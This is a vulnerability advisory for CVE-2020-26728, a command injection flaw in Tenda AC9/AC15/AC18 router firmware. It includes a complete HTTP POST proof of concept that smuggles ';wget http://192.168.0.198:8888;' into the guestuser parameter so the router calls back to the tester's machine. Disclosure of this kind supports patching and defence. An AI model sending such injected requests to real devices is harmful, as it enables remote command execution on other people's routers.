CVE-2020-26728: routers/rce1.md at a80b30bccfc9b76f3a4868ff28ad5ce2e0fca180 · Lyc-heng/routers

vendor:Tenda

product:AC9 AC15 AC18

version:V15.03.06.42_multi(AC9)，V15.03.05.19(6318)_CN(AC9) and earlier

type:Arbitrary Command Execution

author:Li Yuan Cheng

institution:School of Computer and Cyberspace@Communication University of China

Vulnerability description

I found an Arbitrary Command Execution vulnerability in the router’s web server–httpd. While processing the guestuser parameters for a post request, the value is directly passed to doSystem, which causes a rce. The details are shown below:

PoC

POST /goform/SetSambaCfg HTTP/1.1
Host: 192.168.0.1
Proxy-Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: password=hwrmji
Content-Length: 154

password=111111&premitEn=0&internetPort=21&action=delelte&usbName=1&guestpwd=guest&guestuser=;wget http://192.168.0.198:8888;&guestaccess=r&fileCode=UTF-8

While action!=del,after the first request is sent, the guestuser will be set to ;wget http://192.168.0.198:8888;, and the router will read the value of guestuser for the second send, and then execute wget http ://192.168.0.198:8888. 192.168.0.198 is our native computer’s ip, then we use nc to listen port 8888, finally we capture http request from 192.168.0.1, as shown in the figure below.

We tested the vulnerability on a real device, the picture may be a bit fuzzy, but I recorded a video, you can view the specific triggering process of the vulnerability through the video

Watch the operation video